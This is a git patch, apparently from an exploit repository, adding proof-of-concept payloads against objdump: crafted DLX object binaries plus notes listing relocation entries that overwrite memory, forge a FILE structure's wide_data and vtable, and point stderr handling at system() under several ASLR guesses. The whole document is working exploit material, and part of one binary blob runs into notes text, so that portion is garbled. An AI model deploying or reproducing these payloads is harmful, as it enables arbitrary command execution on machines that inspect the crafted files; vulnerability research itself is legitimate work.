From 6580c78f8410b6be08144054d00d8e66f4150671 Mon Sep 17 00:00:00 2001 From: Church of Malware <3+ek0ms@noreply.git.churchofmalware.org> Date: Mon, 29 Jun 2026 16:58:15 +0000 Subject: [PATCH] Upload files to "objdump-dlx-calc-poc/payloads" --- ...lc_aslr_orig_f06_bf020ff00_s7042e500.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s7043e4ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s7043e4ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s7043e5ff.notes | 34 ++++++++++++++++++ 5 files changed, 102 insertions(+) create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes new file mode 100644 index 0000000..6dff12b --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7042e500 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..9184d6d05659464ae4a10d3c9109c1037107cffa GIT binary patch literal 1280 zcmd5*O-md>5Ph>Vx*ula$C^#lfPn}JEUfnI8Wjx*i1Cnsf(IolXe65`_=UZKVj%tm z?|Stl{(yM$n4b_ZM-Luz_b|SiuN|8la!f(@t5@}=sP3u$KK0?9m9h|<_3@N`B4FS6 zxvIavL>jHJ_P=sc`{PK&Qli0$q$d<3NFNX9DPE{DQahNaDvpQQ{}SV~LLf zPg23v^#p+45c@*>JFr;dzpw)yib@Nf=MkN*fIIY)JdIxi=ZSpI(B}<(2l;J6UoiAV zL*HZMpBnjoBmdmUzxeY^+Ku}!8Tvs(U)i3#PM&YX(DOgsJO7&*zkFPO($G&E`uF5= zuhD(Z&=-sNTtH*aIr1&Y>mg_b?Lt?etI)&Hub@YuN1?}3juGFEv$U4U|9ES9ZTHt!;kULV2gYevj+@jmD=Hlyze#z}3(Td;AxW z8Iu*gb9wnPQ;|h}nt|jza;|X{i4wU2ea=7La*6T1_)F^e_e{)i$y^8z&0;O FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..714a463865c3134cc42422f05897ae91321afddb GIT binary patch literal 1280 zcmd5*O-md>5Ph>Vx*ula$C^#lfPn}JEUfnI8Wjx*i1Cnsf(IolXe65`_=UZKVj%tm z?|Stl{(yM$n4b_ZSHWZM9>!PmwPTY*jw$GV^{U zSM~RoNTW5@{#QRIwbxZ=#=RJfhPTaEE@9r}1mxJdw{C`n;jXE z=zEO(QzPGRtwaqVEDDTwQ?{U4q(fG82vTp1IxEgw4kN*NP zW3r-mE-znZDzeB=GmxA|&NYrAQ6g8M&-uq&E-}6re@Pwxo{1SQnG4~eS*&GUlC*Gf i)cqc0HcKHVh}pB;YQ7t6QBM^~Hskgg{nt$%^nM5VzJ1XE literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes new file mode 100644 index 0000000..2df83df --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE